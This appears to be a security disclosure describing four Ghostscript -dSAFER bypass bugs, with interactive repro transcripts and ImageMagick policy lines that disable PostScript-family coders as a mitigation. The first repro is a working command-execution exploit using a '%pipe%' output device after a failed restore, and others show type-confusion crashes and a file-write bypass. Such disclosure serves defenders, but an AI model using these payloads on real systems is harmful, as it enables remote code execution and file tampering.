Vulnerabilities in Ghostscript can lead to remote code execution
1. /invalidaccess checks stop working after a failed restore, so you can just execute shell commands if you handle the error. Exploitation is very trivial. Repro:
$ gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null
GS>legal
GS>{ null restore } stopped { pop } if
GS>legal
GS>mark /OutputFile (%pipe%id) currentdevice putdeviceprops
GS<1>showpage
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c10232. setcolor claims no operand checking is necessary, because it’s hidden behind a pseudo-operator of the same name. That’s true, but you can still call it indirectly via setpattern, so type checking is necessary. Repro:
$ gs -q -sDEVICE=ppmraw -dSAFER
GS><< /Whatever 16#414141414141 >> setpattern
Segmentation fault3. The LockDistillerParams boolean isn’t type checked, so nice easy type confusion. Repro:
$ gs -q -sDEVICE=ppmraw -dSAFER
GS><< /LockDistillerParams 16#4141414141414141 >> .setdistillerparams
Segmentation fault4. .tempfile permissions don’t seem to work, I don’t know when they broke. You’re not supposed to be able to open files outside of the patterns in the PermitFileReading array, but that doesn’t seem to work for me e.g.:
$ strace -fefile gs -sDEVICE=ppmraw -dSAFER
…
GS>(/proc/self/cwd/hello) (w) .tempfile
open(“/proc/self/cwd/hello26E8LQ”, O_RDWR|O_CREAT|O_EXCL, 0600) = 3
GS<2>dup
GS<3>(hello) writestring
GS<2>closefile
<policy domain="coder" rights="none" pattern="PS" />
<policy domain="coder" rights="none" pattern="EPS" />
<policy domain="coder" rights="none" pattern="PDF" />
<policy domain="coder" rights="none" pattern="XPS" />